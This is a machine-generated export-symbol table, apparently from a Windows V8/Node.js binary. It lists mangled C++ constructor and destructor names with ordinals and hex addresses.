                                                                                                                                                                                                                                    ??0SuppressMicrotaskExecutionScope@Isolate@v8@@QEAA@PEAV12@PEAVMicrotaskQueue@2@@Z10710x140c76fd0
                                                                                                                                                                                                                                    ??0Sweeper@internal@cppgc@@QEAA@AEAVHeapBase@12@@Z10720x140506490
                                                                                                                                                                                                                                    ??0SwissNameDictionary@internal@v8@@IEAA@_K@Z10730x140097ad0
                                                                                                                                                                                                                                    ??0SwissNameDictionary@internal@v8@@QEAA@XZ10740x14010d5b0
                                                                                                                                                                                                                                    ??0SwitchBuilder@interpreter@internal@v8@@QEAA@PEAVBytecodeArrayBuilder@123@PEAVBlockCoverageBuilder@123@PEAVSwitchStatement@23@HPEAVBytecodeJumpTable@123@@Z10750x140a329a0
                                                                                                                                                                                                                                    ??0Symbolizer@internal@v8@@QEAA@PEAVCodeMap@12@@Z10760x140097ad0
                                                                                                                                                                                                                                    ??0SyncStreamingDecoder@wasm@internal@v8@@QEAA@$$QEAV0123@@Z10770x1406671a0
                                                                                                                                                                                                                                    ??0SyncStreamingDecoder@wasm@internal@v8@@QEAA@AEBV0123@@Z10780x1406672d0
                                                                                                                                                                                                                                    ??0SyncStreamingDecoder@wasm@internal@v8@@QEAA@PEAVIsolate@23@AEBVWasmFeatures@123@V?$Handle@VContext@internal@v8@@@23@PEBDV?$shared_ptr@VCompilationResultResolver@wasm@internal@v8@@@std@@@Z10790x1406674b0
                                                                                                                                                                                                                                    ??0Thread@base@v8@@QEAA@AEBVOptions@012@@Z10800x140ff3080
                                                                                                                                                                                                                                    ??0ThreadTicks@base@v8@@AEAA@_J@Z10810x140097ad0
                                                                                                                                                                                                                                    ??0ThreadTicks@base@v8@@QEAA@XZ10820x14010d5b0
                                                                                                                                                                                                                                    ??0ThrowOnJavascriptExecution@internal@v8@@QEAA@PEAVIsolate@12@@Z10830x140bda8f0
                                                                                                                                                                                                                                    ??0TickSample@internal@v8@@QEAA@XZ10840x14085cfb0
                                                                                                                                                                                                                                    ??0Time@base@v8@@AEAA@_J@Z10850x140097ad0
                                                                                                                                                                                                                                    ??0Time@base@v8@@QEAA@XZ10860x14010d5b0
                                                                                                                                                                                                                                    ??0TimeDelta@base@v8@@AEAA@_J@Z10870x140097ad0
                                                                                                                                                                                                                                    ??0TimeDelta@base@v8@@QEAA@XZ10880x14010d5b0
                                                                                                                                                                                                                                    ??0TimeTicks@base@v8@@AEAA@_J@Z10890x140097ad0
                                                                                                                                                                                                                                    ??0TimeTicks@base@v8@@QEAA@XZ10900x14010d5b0
                                                                                                                                                                                                                                    ??0TopLevelLiveRange@compiler@internal@v8@@QEAA@HW4MachineRepresentation@23@@Z10910x1411062b0
                                                                                                                                                                                                                                    ??0TracedGlobalHandleVisitor@EmbedderHeapTracer@v8@@QEAA@AEBV012@@Z10920x1400972b0
                                                                                                                                                                                                                                    ??0TracedGlobalHandleVisitor@EmbedderHeapTracer@v8@@QEAA@XZ10930x1400972b0
                                                                                                                                                                                                                                    ??0TracedValue@tracing@v8@@AEAA@XZ10940x1407bdab0
                                                                                                                                                                                                                                    ??0TransitionsAccessor@internal@v8@@QEAA@PEAVIsolate@12@VMap@12@_N@Z10950x140538170
                                                                                                                                                                                                                                    ??0TryCatch@v8@@QEAA@PEAVIsolate@1@@Z10960x140c77000
                                                                                                                                                                                                                                    ??0TryCatchBuilder@interpreter@internal@v8@@QEAA@PEAVBytecodeArrayBuilder@123@PEAVBlockCoverageBuilder@123@PEAVTryCatchStatement@23@W4CatchPrediction@HandlerTable@23@@Z10970x140a32ab0
                                                                                                                                                                                                                                    ??0TryFinallyBuilder@interpreter@internal@v8@@QEAA@PEAVBytecodeArrayBuilder@123@PEAVBlockCoverageBuilder@123@PEAVTryFinallyStatement@23@W4CatchPrediction@HandlerTable@23@@Z10980x140a32b20
                                                                                                                                                                                                                                    ??0TurboAssembler@internal@v8@@QEAA@PEAVIsolate@12@AEBUAssemblerOptions@12@W4CodeObjectRequired@12@V?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z10990x1405590e0
                                                                                                                                                                                                                                    ??0TurboAssembler@internal@v8@@QEAA@PEAVIsolate@12@W4CodeObjectRequired@12@V?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z11000x140559140
                                                                                                                                                                                                                                    ??0TurboAssemblerBase@internal@v8@@QEAA@PEAVIsolate@12@AEBUAssemblerOptions@12@W4CodeObjectRequired@12@V?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z11010x140bdad30
                                                                                                                                                                                                                                    ??0TurboAssemblerBase@internal@v8@@QEAA@PEAVIsolate@12@W4CodeObjectRequired@12@V?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z11020x140559350
                                                                                                                                                                                                                                    ??0Type@compiler@internal@v8@@AEAA@PEAVTypeBase@123@@Z11030x140097ad0
                                                                                                                                                                                                                                    ??0Type@compiler@internal@v8@@AEAA@_K@Z11040x14057e030
                                                                                                                                                                                                                                    ??0Type@compiler@internal@v8@@QEAA@XZ11050x14010d5b0
                                                                                                                                                                                                                                    ??0TypeCache@compiler@internal@v8@@QEAA@XZ11060x141159fa0
                                                                                                                                                                                                                                    ??0TypeNarrowingReducer@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@@Z11070x141200d50
                                                                                                                                                                                                                                    ??0TypeProfile@debug@v8@@AEAA@V?$shared_ptr@VTypeProfile@internal@v8@@@std@@@Z11080x1404e3f00
                                                                                                                                                                                                                                    ??0TypeProfile@debug@v8@@QEAA@$$QEAV012@@Z11090x1404e3f00
                                                                                                                                                                                                                                    ??0TypedOptimization@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVCompilationDependencies@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@@Z11100x141201d40
                                                                                                                                                                                                                                    ??0TypedSlotSet@internal@v8@@QEAA@$$QEAV012@@Z11110x1405381c0
                                                                                                                                                                                                                                    ??0TypedSlotSet@internal@v8@@QEAA@AEBV012@@Z11120x1405381c0
                                                                                                                                                                                                                                    ??0TypedSlotSet@internal@v8@@QEAA@_K@Z11130x1405381f0
                                                                                                                                                                                                                                    ??0TypedSlots@internal@v8@@QEAA@AEBV012@@Z11140x140538210
                                                                                                                                                                                                                                    ??0TypedSlots@internal@v8@@QEAA@XZ11150x140538230
                                                                                                                                                                                                                                    ??0Typer@compiler@internal@v8@@QEAA@PEAVJSHeapBroker@123@V?$Flags@W4Flag@Typer@compiler@internal@v8@@H@base@3@PEAVGraph@123@PEAVTickCounter@23@@Z11160x1412054d0
                                                                                                                                                                                                                                    ??0UnicodeRangeSplitter@internal@v8@@QEAA@PEAV?$ZoneList@VCharacterRange@internal@v8@@@12@@Z11170x140849000
                                                                                                                                                                                                                                    ??0UnifiedHeapMarkingVerifier@internal@v8@@QEAA@AEAVHeapBase@1cppgc@@W4CollectionType@MarkingConfig@MarkerBase@14@@Z11180x140b3b910
                                                                                                                                                                                                                                    ??0UnifiedHeapMarkingVisitorBase@internal@v8@@QEAA@AEAVHeapBase@1cppgc@@AEAVBasicMarkingState@14@AEAVUnifiedHeapMarkingState@12@@Z11190x140b3b340
                                                                                                                                                                                                                                    ??0UnifiedHeapMarkingVisitorBase@internal@v8@@QEAA@AEBV012@@Z11200x140b3b360
                                                                                                                                                                                                                                    ??0Unlocker@v8@@QEAA@PEAVIsolate@1@@Z11210x140098410
                                                                                                                                                                                                                                    ??0UnoptimizedCompilationInfo@internal@v8@@QEAA@$$QEAV012@@Z11220x14073e380
                                                                                                                                                                                                                                    ??0UnoptimizedCompilationInfo@internal@v8@@QEAA@AEBV012@@Z11230x14073e400
                                                                                                                                                                                                                                    ??0UnoptimizedCompilationInfo@internal@v8@@QEAA@PEAVZone@12@PEAVParseInfo@12@PEAVFunctionLiteral@12@@Z11240x140bdac50
                                                                                                                                                                                                                                    ??0UnoptimizedCompileFlags@internal@v8@@AEAA@PEAVIsolate@12@H@Z11250x1408c87b0
                                                                                                                                                                                                                                    ??0UnoptimizedCompileState@internal@v8@@QEAA@XZ11260x140538250
                                                                                                                                                                                                                                    ??0UsePosition@compiler@internal@v8@@QEAA@VLifetimePosition@123@PEAVInstructionOperand@123@PEAXW4UsePositionHintType@123@@Z11270x1411067f0
                                                                                                                                                                                                                                    ??0Uses@Node@compiler@internal@v8@@QEAA@PEAV1234@@Z11280x140097ad0
                                                                                                                                                                                                                                    ??0Utf8Decoder@internal@v8@@QEAA@AEBV?$Vector@$$CBE@base@2@@Z11290x1407cca00
                                                                                                                                                                                                                                    ??0Utf8Value@String@v8@@QEAA@PEAVIsolate@2@V?$Local@VValue@v8@@@2@@Z11300x140c77050
                                                                                                                                                                                                                                    ??0V8ContextInfo@v8_inspector@@QEAA@V?$Local@VContext@v8@@@v8@@HVStringView@1@@Z11310x1404e3ff0
                                                                                                                                                                                                                                    ??0V8DebuggerId@v8_inspector@@AEAA@U?$pair@_J_J@std@@@Z11320x140097ca0
                                                                                                                                                                                                                                    ??0V8DebuggerId@v8_inspector@@QEAA@XZ11330x140097c90
                                                                                                                                                                                                                                    ??0V8HeapExplorer@internal@v8@@QEAA@PEAVHeapSnapshot@12@PEAVSnapshottingProgressReportingInterface@12@PEAVObjectNameResolver@HeapProfiler@2@@Z11340x14086abb0
                                                                                                                                                                                                                                    ??0V8Inspector@v8_inspector@@QEAA@AEBV01@@Z11350x1404e4030
                                                                                                                                                                                                                                    ??0V8Inspector@v8_inspector@@QEAA@XZ11360x1404e4030
                                                                                                                                                                                                                                    ??0V8InspectorClient@v8_inspector@@QEAA@AEBV01@@Z11370x1404e4040
                                                                                                                                                                                                                                    ??0V8InspectorClient@v8_inspector@@QEAA@XZ11380x1404e4040
                                                                                                                                                                                                                                    ??0V8InspectorImpl@v8_inspector@@QEAA@PEAVIsolate@v8@@PEAVV8InspectorClient@1@@Z11390x140771b60
                                                                                                                                                                                                                                    ??0V8InspectorSession@v8_inspector@@QEAA@AEBV01@@Z11400x1404e4050
                                                                                                                                                                                                                                    ??0V8InspectorSession@v8_inspector@@QEAA@XZ11410x1404e4050
                                                                                                                                                                                                                                    ??0V8StackTrace@v8_inspector@@QEAA@AEBV01@@Z11420x1404e4060
                                                                                                                                                                                                                                    ??0V8StackTrace@v8_inspector@@QEAA@XZ11430x1404e4060
                                                                                                                                                                                                                                    ??0V8StackTraceId@v8_inspector@@QEAA@VStringView@1@@Z11440x14075e210
                                                                                                                                                                                                                                    ??0V8StackTraceId@v8_inspector@@QEAA@XZ11450x14075e520
                                                                                                                                                                                                                                    ??0V8StackTraceId@v8_inspector@@QEAA@_KU?$pair@_J_J@std@@@Z11460x14075e560
                                                                                                                                                                                                                                    ??0V8StackTraceId@v8_inspector@@QEAA@_KU?$pair@_J_J@std@@_N@Z11470x14075e580
                                                                                                                                                                                                                                    ??0Value@String@v8@@QEAA@PEAVIsolate@2@V?$Local@VValue@v8@@@2@@Z11480x140c771b0
                                                                                                                                                                                                                                    ??0ValueDeserializer@v8@@QEAA@PEAVIsolate@1@PEBE_K@Z11490x140c77380
                                                                                                                                                                                                                                    ??0ValueDeserializer@v8@@QEAA@PEAVIsolate@1@PEBE_KPEAVDelegate@01@@Z11500x140c773a0
                                                                                                                                                                                                                                    ??0ValueNumberingReducer@compiler@internal@v8@@QEAA@AEBV0123@@Z11510x141093ac0
                                                                                                                                                                                                                                    ??0ValueNumberingReducer@compiler@internal@v8@@QEAA@PEAVZone@23@0@Z11520x14120d5a0
                                                                                                                                                                                                                                    ??0ValueSerializer@v8@@QEAA@PEAVIsolate@1@@Z11530x140c77430
                                                                                                                                                                                                                                    ??0ValueSerializer@v8@@QEAA@PEAVIsolate@1@PEAVDelegate@01@@Z11540x140c774a0
                                                                                                                                                                                                                                    ??0VirtualAddressSpace@base@v8@@QEAA@AEBV012@@Z11550x140ffbcc0
                                                                                                                                                                                                                                    ??0VirtualAddressSpace@base@v8@@QEAA@XZ11560x140ffbd00
                                                                                                                                                                                                                                    ??0VirtualAddressSubspace@base@v8@@AEAA@VAddressSpaceReservation@12@PEAVVirtualAddressSpaceBase@12@W4PagePermissions@2@@Z11570x140ffbd60
                                                                                                                                                                                                                                    ??0VirtualMemory@internal@cppgc@@QEAA@$$QEAV012@@Z11580x140504bd0
                                                                                                                                                                                                                                    ??0VirtualMemory@internal@cppgc@@QEAA@PEAVPageAllocator@v8@@_K1PEAX@Z11590x140504c00
                                                                                                                                                                                                                                    ??0VirtualMemory@internal@cppgc@@QEAA@XZ11600x14009a1b0
                                                                                                                                                                                                                                    ??0VirtualMemory@internal@v8@@QEAA@PEAVPageAllocator@2@_KPEAX1W4JitPermission@012@@Z11610x1407bc400
                                                                                                                                                                                                                                    ??0VirtualMemory@internal@v8@@QEAA@XZ11620x14009a1b0
                                                                                                                                                                                                                                    ??0Visitor@cppgc@@QEAA@AEBV01@@Z11630x14050f240
                                                                                                                                                                                                                                    ??0Visitor@cppgc@@QEAA@VKey@01@@Z11640x14050f240
                                                                                                                                                                                                                                    ??0VoidDescriptor@internal@v8@@IEAA@W4Key@CallDescriptors@12@@Z11650x14057d2a0
                                                                                                                                                                                                                                    ??0VoidDescriptor@internal@v8@@QEAA@XZ11660x14057e040
                                                                                                                                                                                                                                    ??0WasmCode@wasm@internal@v8@@AEAA@PEAVNativeModule@123@HV?$Vector@E@base@3@HIHHHHHV?$Vector@$$CBE@63@22W4Kind@0123@W4ExecutionTier@123@W4ForDebugging@123@@Z11670x140538290
                                                                                                                                                                                                                                    ??0WasmCodeManager@wasm@internal@v8@@QEAA@XZ11680x14065d1c0
                                                                                                                                                                                                                                    ??0WasmCodeRefScope@wasm@internal@v8@@QEAA@XZ11690x14065d230
                                                                                                                                                                                                                                    ??0WasmCompilationUnit@wasm@internal@v8@@QEAA@HW4ExecutionTier@123@W4ForDebugging@123@@Z11700x14061c800
                                                                                                                                                                                                                                    ??0WasmDebugSymbols@wasm@internal@v8@@QEAA@XZ11710x1405383e0
                                                                                                                                                                                                                                    ??0WasmEngine@wasm@internal@v8@@QEAA@XZ11720x1406497d0
                                                                                                                                                                                                                                    ??0WasmError@wasm@internal@v8@@QEAA@$$QEAV0123@@Z11730x14061c810
                                                                                                                                                                                                                                    ??0WasmError@wasm@internal@v8@@QEAA@AEBV0123@@Z11740x14061c850
                                                                                                                                                                                                                                    ??0WasmError@wasm@internal@v8@@QEAA@IPEBDZZ11750x14061c880
                                                                                                                                                                                                                                    ??0WasmError@wasm@internal@v8@@QEAA@IV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z11760x14061c9a0
                                                                                                                                                                                                                                    ??0WasmError@wasm@internal@v8@@QEAA@XZ11770x14061c9e0
                                                                                                                                                                                                                                    ??0WasmExceptionPackage@internal@v8@@IEAA@_K@Z11780x140097ad0
                                                                                                                                                                                                                                    ??0WasmExceptionPackage@internal@v8@@QEAA@XZ11790x14010d5b0
                                                                                                                                                                                                                                    ??0WasmFunctionBuilder@wasm@internal@v8@@AEAA@PEAVWasmModuleBuilder@123@@Z11800x140632800
                                                                                                                                                                                                                                    ??0WasmFunctionBuilder@wasm@internal@v8@@QEAA@$$QEAV0123@@Z11810x1406329b0
                                                                                                                                                                                                                                    ??0WasmFunctionBuilder@wasm@internal@v8@@QEAA@AEBV0123@@Z11820x140632c00
                                                                                                                                                                                                                                    ??0WasmGraphBuilder@compiler@internal@v8@@IEAA@PEAUCompilationEnv@wasm@23@PEAVZone@23@PEAVMachineGraph@123@PEBV?$Signature@VValueType@wasm@internal@v8@@@23@PEAVSourcePositionTable@123@W4Parameter0Mode@0123@PEAVIsolate@23@@Z11830x1410711c0
                                                                                                                                                                                                                                    ??0WasmGraphBuilder@compiler@internal@v8@@QEAA@PEAUCompilationEnv@wasm@23@PEAVZone@23@PEAVMachineGraph@123@PEBV?$Signature@VValueType@wasm@internal@v8@@@23@PEAVSourcePositionTable@123@@Z11840x14061ca00
                                                                                                                                                                                                                                    ??0WasmInstanceObject@internal@v8@@IEAA@_K@Z11850x140097ad0
                                                                                                                                                                                                                                    ??0WasmInstanceObject@internal@v8@@QEAA@XZ11860x14010d5b0
                                                                                                                                                                                                                                    ??0WasmModule@wasm@internal@v8@@QEAA@V?$unique_ptr@VZone@internal@v8@@U?$default_delete@VZone@internal@v8@@@std@@@std@@@Z11870x14062cfd0
                                                                                                                                                                                                                                    ??0WasmModuleBuilder@wasm@internal@v8@@QEAA@PEAVZone@23@@Z11880x140632db0
                                                                                                                                                                                                                                    ??0WasmModuleObjectBuilderStreaming@v8@@AEAA@$$QEAV01@@Z11890x1400985f0
                                                                                                                                                                                                                                    ??0WasmModuleObjectBuilderStreaming@v8@@QEAA@PEAVIsolate@1@@Z11900x140537580
                                                                                                                                                                                                                                    ??0WasmModuleSourceMap@wasm@internal@v8@@QEAA@$$QEAV0123@@Z11910x1405383f0
                                                                                                                                                                                                                                    ??0WasmModuleSourceMap@wasm@internal@v8@@QEAA@AEBV0123@@Z11920x1405384a0
                                                                                                                                                                                                                                    ??0WasmModuleSourceMap@wasm@internal@v8@@QEAA@PEAVIsolate@3@V?$Local@VString@v8@@@3@@Z11930x140630550
                                                                                                                                                                                                                                    ??0WasmSerializer@wasm@internal@v8@@QEAA@PEAVNativeModule@123@@Z11940x14061ca40
                                                                                                                                                                                                                                    ??0WasmStreaming@v8@@QEAA@V?$unique_ptr@VWasmStreamingImpl@WasmStreaming@v8@@U?$default_delete@VWasmStreamingImpl@WasmStreaming@v8@@@std@@@std@@@Z11950x140638d60
                                                                                                                                                                                                                                    ??0WeakCodeRegistry@internal@v8@@QEAA@AEBV012@@Z11960x14085c840
                                                                                                                                                                                                                                    ??0WeakCodeRegistry@internal@v8@@QEAA@PEAVIsolate@12@@Z11970x14057d300
                                                                                                                                                                                                                                    ??0WebDriverValue@v8_inspector@@QEAA@VStringView@1@V?$MaybeLocal@VValue@v8@@@v8@@@Z11980x1404e4070
                                                                                                                                                                                                                                    ??0WebSnapshotDeserializer@internal@v8@@AEAA@PEAVIsolate@12@V?$Handle@VObject@internal@v8@@@12@V?$Vector@$$CBE@base@2@@Z11990x1407ae8e0
                                                                                                                                                                                                                                    ??0WebSnapshotDeserializer@internal@v8@@QEAA@PEAVIsolate@12@V?$Handle@VScript@internal@v8@@@12@@Z12000x1407aea20
                                                                                                                                                                                                                                    ??0WebSnapshotDeserializer@internal@v8@@QEAA@PEAVIsolate@2@PEBE_K@Z12010x1407aead0
                                                                                                                                                                                                                                    ??0WebSnapshotSerializer@internal@v8@@QEAA@PEAVIsolate@12@@Z12020x1407aeb10
                                                                                                                                                                                                                                    ??0WebSnapshotSerializer@internal@v8@@QEAA@PEAVIsolate@2@@Z12030x1407aefe0
                                                                                                                                                                                                                                    ??0Zone@internal@v8@@QEAA@PEAVAccountingAllocator@12@PEBD_N@Z12040x1407ae1f0
                                                                                                                                                                                                                                    ??0ZonePreparseData@internal@v8@@QEAA@PEAVZone@12@PEAV?$Vector@E@base@2@H@Z12050x1408b6360
                                                                                                                                                                                                                                    ??0ZoneStats@compiler@internal@v8@@QEAA@PEAVAccountingAllocator@23@@Z12060x1411d2e30
                                                                                                                                                                                                                                    ??0iterator@JumpTableTargetOffsets@interpreter@internal@v8@@QEAA@HHHPEBVBytecodeArrayIterator@234@@Z12070x140a533c0
                                                                                                                                                                                                                                    ??0iterator@StateValuesAccess@compiler@internal@v8@@AEAA@PEAVNode@234@@Z12080x1410dfa20
                                                                                                                                                                                                                                    ??0iterator@StateValuesAccess@compiler@internal@v8@@AEAA@XZ12090x14105b390
                                                                                                                                                                                                                                    ??1?$CanonicalHandleScopeForOptimization@VOptimizedCompilationInfo@internal@v8@@@internal@v8@@QEAA@XZ12100x140b4af90
                                                                                                                                                                                                                                    ??1?$Deserializer@VIsolate@internal@v8@@@internal@v8@@UEAA@XZ12110x1407e8f50
                                                                                                                                                                                                                                    ??1?$Deserializer@VLocalIsolate@internal@v8@@@internal@v8@@UEAA@XZ12120x1407e93a0
                                                                                                                                                                                                                                    ??1?$ParserBase@VParser@internal@v8@@@internal@v8@@QEAA@XZ12130x14088ccd0
                                                                                                                                                                                                                                    ??1?$PerThreadAssertScope@$00$00@internal@v8@@QEAA@XZ12140x140bda910
                                                                                                                                                                                                                                    ??1?$PerThreadAssertScope@$00$0A@@internal@v8@@QEAA@XZ12150x140bda910
                                                                                                                                                                                                                                    ??1?$PerThreadAssertScope@$01$00@internal@v8@@QEAA@XZ12160x140bda910
                                                                                                                                                                                                                                    ??1?$PerThreadAssertScope@$01$0A@@internal@v8@@QEAA@XZ12170x140bda910
                                                                                                                                                                                                                                    ??1?$PerThreadAssertScope@$02$00@internal@v8@@QEAA@XZ12180x140bda910
                                                                                                                                                                                                                                    ??1?$PerThreadAssertScope@$02$0A@@internal@v8@@QEAA@XZ12190x140bda910
                                                                                                                                                                                                                                    ??1?$PerThreadAssertScope@$03$00@internal@v8@@QEAA@XZ12200x140bda910
                                                                                                                                                                                                                                    ??1?$PerThreadAssertScope@$03$0A@@internal@v8@@QEAA@XZ12210x140bda910
                                                                                                                                                                                                                                    ??1?$PerThreadAssertScope@$04$00@internal@v8@@QEAA@XZ12220x140bda910
                                                                                                                                                                                                                                    ??1?$PerThreadAssertScope@$04$0A@@internal@v8@@QEAA@XZ12230x140bda910
                                                                                                                                                                                                                                    ??1?$PerThreadAssertScope@$05$0A@@internal@v8@@QEAA@XZ12240x140bda910
                                                                                                                                                                                                                                    ??1?$PerThreadAssertScope@$0A@$00@internal@v8@@QEAA@XZ12250x140bda910
                                                                                                                                                                                                                                    ??1?$PerThreadAssertScope@$0A@$0A@@internal@v8@@QEAA@XZ12260x140bda910
                                                                                                                                                                                                                                    ??1?$SharedTurboAssemblerBase@VTurboAssembler@internal@v8@@@internal@v8@@UEAA@XZ12270x1405593f0
                                                                                                                                                                                                                                    ??1?$ZoneVector@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@QEAA@XZ12280x140538b00
                                                                                                                                                                                                                                    ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ12290x140101b80
                                                                                                                                                                                                                                    ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ12300x140101b90
                                                                                                                                                                                                                                    ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ12310x140101c40
                                                                                                                                                                                                                                    ??1?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAA@XZ12320x140538b00
                                                                                                                                                                                                                                    ??1?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAA@XZ12330x14009a1e0
                                                                                                                                                                                                                                    ??1?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAA@XZ12340x140099e50
                                                                                                                                                                                                                                    ??1AccountingAllocator@internal@v8@@UEAA@XZ12350x1407ae660
                                                                                                                                                                                                                                    ??1ActivityControl@v8@@UEAA@XZ12360x1400971a0
                                                                                                                                                                                                                                    ??1AddTypeAssertionsReducer@compiler@internal@v8@@UEAA@XZ12370x1410f4fc0
                                                                                                                                                                                                                                    ??1AddressToTraceMap@internal@v8@@QEAA@XZ12380x14086ad80
                                                                                                                                                                                                                                    ??1AlignedCachedData@internal@v8@@QEAA@XZ12390x14061cc60
                                                                                                                                                                                                                                    ??1AllocationProfile@v8@@UEAA@XZ12400x1400971a0
                                                                                                                                                                                                                                    ??1Allocator@ArrayBuffer@v8@@UEAA@XZ12410x1400971a0
                                                                                                                                                                                                                                    ??1AllowCompilation@internal@v8@@QEAA@XZ12420x140bda940
                                                                                                                                                                                                                                    ??1AllowDeoptimization@internal@v8@@QEAA@XZ12430x140bda950
                                                                                                                                                                                                                                    ??1AllowExceptions@internal@v8@@QEAA@XZ12440x140bda960
                                                                                                                                                                                                                                    ??1AllowJavascriptExecution@internal@v8@@QEAA@XZ12450x140bda970
                                                                                                                                                                                                                                    ??1AllowJavascriptExecutionScope@Isolate@v8@@QEAA@XZ12460x140c776d0
                                                                                                                                                                                                                                    ??1ArrayBufferAllocator@node@@UEAA@XZ12470x1400971a0
                                                                                                                                                                                                                                    ??1AsmCallableType@wasm@internal@v8@@MEAA@XZ12480x1400971a0
                                                                                                                                                                                                                                    ??1AsmFunctionType@wasm@internal@v8@@UEAA@XZ12490x14057e2a0
                                                                                                                                                                                                                                    ??1AsmJsOffsetInformation@wasm@internal@v8@@QEAA@XZ12500x14062d3f0
                                                                                                                                                                                                                                    ??1AsmJsScanner@internal@v8@@QEAA@XZ12510x1407335a0
                                                                                                                                                                                                                                    ??1AsmOverloadedFunctionType@wasm@internal@v8@@UEAA@XZ12520x140538e50
                                                                                                                                                                                                                                    ??1Assembler@internal@v8@@UEAA@XZ12530x140559400
                                                                                                                                                                                                                                    ??1AssemblerBase@internal@v8@@UEAA@XZ12540x140c0ec30
                                                                                                                                                                                                                                    ??1AsyncResource@node@@UEAA@XZ12550x1402a2180
                                                                                                                                                                                                                                    ??1AsyncStreamingDecoder@wasm@internal@v8@@UEAA@XZ12560x140668160
                                                                                                                                                                                                                                    ??1BackgroundCompileTask@internal@v8@@QEAA@XZ12570x140c005f0
                                                                                                                                                                                                                                    ??1BackgroundDeserializeTask@internal@v8@@QEAA@XZ12580x1406bbe80
                                                                                                                                                                                                                                    ??1BackingStore@internal@v8@@QEAA@XZ12590x140a05fe0
                                                                                                                                                                                                                                    ??1BackingStore@v8@@QEAA@XZ12600x140c77710
                                                                                                                                                                                                                                    ??1BackupIncumbentScope@Context@v8@@QEAA@XZ12610x140c77720
                                                                                                                                                                                                                                    ??1BaseSpace@internal@cppgc@@UEAA@XZ12620x140519c90
                                                                                                                                                                                                                                    ??1BaseSpace@internal@v8@@MEAA@XZ12630x1400971a0
                                                                                                                                                                                                                                    ??1BasicBlock@compiler@internal@v8@@QEAA@XZ12640x1405846f0
                                                                                                                                                                                                                                    ??1Binary@protocol@v8_inspector@@QEAA@XZ12650x14009b260
                                                                                                                                                                                                                                    ??1BlockBuilder@interpreter@internal@v8@@UEAA@XZ12660x140a32be0
                                                                                                                                                                                                                                    ??1BlockData@Coverage@debug@v8@@QEAA@XZ12670x1405387f0
                                                                                                                                                                                                                                    ??1BoundedPageAllocator@base@v8@@UEAA@XZ12680x140ffb6a0
                                                                                                                                                                                                                                    ??1BranchConditionDuplicator@compiler@internal@v8@@QEAA@XZ12690x141093c40
                                                                                                                                                                                                                                    ??1BranchElimination@compiler@internal@v8@@UEAA@XZ12700x141116fb0
                                                                                                                                                                                                                                    ??1BranchHintMap@wasm@internal@v8@@QEAA@XZ12710x140538840
                                                                                                                                                                                                                                    ??1BreakableControlFlowBuilder@interpreter@internal@v8@@UEAA@XZ12720x140a32bf0
                                                                                                                                                                                                                                    ??1BytecodeAnalysis@compiler@internal@v8@@QEAA@XZ12730x14111ab20
                                                                                                                                                                                                                                    ??1BytecodeArrayBuilder@interpreter@internal@v8@@QEAA@XZ12740x140a30960
                                                                                                                                                                                                                                    ??1BytecodeArrayIterator@interpreter@internal@v8@@QEAA@XZ12750x140a53400
                                                                                                                                                                                                                                    ??1BytecodeArrayRandomIterator@interpreter@internal@v8@@QEAA@XZ12760x140a52e60
                                                                                                                                                                                                                                    ??1BytecodeArrayWriter@interpreter@internal@v8@@QEAA@XZ12770x140a309d0
                                                                                                                                                                                                                                    ??1BytecodeIterator@wasm@internal@v8@@UEAA@XZ12780x14061cc70
                                                                                                                                                                                                                                    ??1BytecodeLabels@interpreter@internal@v8@@QEAA@XZ12790x140a30ac0
                                                                                                                                                                                                                                    ??1BytecodeOffsetIterator@baseline@internal@v8@@QEAA@XZ12800x140c53520
                                                                                                                                                                                                                                    ??1BytecodeRegisterOptimizer@interpreter@internal@v8@@UEAA@XZ12810x140a37b70
                                                                                                                                                                                                                                    ??1CachedData@ScriptCompiler@v8@@QEAA@XZ12820x140c77740
                                                                                                                                                                                                                                    ??1CallbackScope@AsyncResource@node@@QEAA@XZ12830x140098740
                                                                                                                                                                                                                                    ??1CallbackScope@node@@QEAA@XZ12840x1402a10c0
                                                                                                                                                                                                                                    ??1Cancelable@internal@v8@@UEAA@XZ12850x1407c7530
                                                                                                                                                                                                                                    ??1CancelableTask@internal@v8@@UEAA@XZ12860x140538850
                                                                                                                                                                                                                                    ??1CancelableTaskManager@internal@v8@@QEAA@XZ12870x1407c7560
                                                                                                                                                                                                                                    ??1CanonicalHandleScope@internal@v8@@QEAA@XZ12880x140b4b050
                                                                                                                                                                                                                                    ??1Channel@V8Inspector@v8_inspector@@UEAA@XZ12890x1400971a0
                                                                                                                                                                                                                                    ??1CheckpointElimination@compiler@internal@v8@@UEAA@XZ12900x1400971a0
                                                                                                                                                                                                                                    ??1ClassScope@internal@v8@@QEAA@XZ12910x1400971a0
                                                                                                                                                                                                                                    ??1CodeAssembler@compiler@internal@v8@@QEAA@XZ12920x1400971a0
                                                                                                                                                                                                                                    ??1CodeAssemblerLabel@compiler@internal@v8@@QEAA@XZ12930x1410a5d80
                                                                                                                                                                                                                                    ??1CodeAssemblerState@compiler@internal@v8@@QEAA@XZ12940x1410a5e80
                                                                                                                                                                                                                                    ??1CodeAssemblerVariable@compiler@internal@v8@@IEAA@XZ12950x1410a5fd0
                                                                                                                                                                                                                                    ??1CodeEntryStorage@internal@v8@@QEAA@XZ12960x14085c970
